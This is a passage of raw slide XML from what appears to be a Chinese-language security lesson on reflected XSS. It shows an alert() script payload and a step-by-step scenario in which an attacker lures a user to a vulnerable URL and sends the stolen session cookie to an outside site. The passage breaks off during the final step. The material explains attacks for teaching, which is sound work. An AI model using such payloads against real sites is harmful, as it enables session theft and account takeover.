              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert('xss')&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将会造成反射型</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漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457325" y="1688464"/>
            <a:ext cx="1645920" cy="507492"/>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308487" y="1115896"/>
            <a:ext cx="1593850" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1373417"/>
            <a:ext cx="3411854" cy="1664970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5334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假如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.secbug.org/xss.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>反射型跨站漏洞，那么攻击者的攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>步骤可能如下：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是网站</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.secbug.org</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>的忠实粉丝，此时正泡在论坛看信息。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="59690" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击者发现</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.secbug.org/xss.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>存在反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>漏洞，然后精心构 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码，此代码可以盗取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>发送到指定的站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.xxser.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="82550" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）攻击者将带有反射型</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漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>UR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通过站内信发送给用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，站内 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>信为一些诱惑信息，目的是为让用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>单击链接。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）假设用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>单击了带有</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漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>UR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，那么将会把自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Coo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ki</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>发送 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>到网站</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.xxser.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="9525" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）攻击者接收到用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Coo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ki</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，可以直接利用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Coo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ki</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
